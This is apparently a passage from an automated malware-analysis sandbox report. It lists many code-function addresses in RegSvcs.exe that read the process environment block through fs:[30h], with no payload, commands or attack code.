Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01344015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01344015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01332073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01341074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01290050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01290050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012B90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012AF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01279080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012758EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01345BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01288A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01293A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01304257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012FA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01323D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01297D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01328DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012ABC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013314FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01274F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01274F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130FF10 mov eax, dword ptr fs:[00000030h]
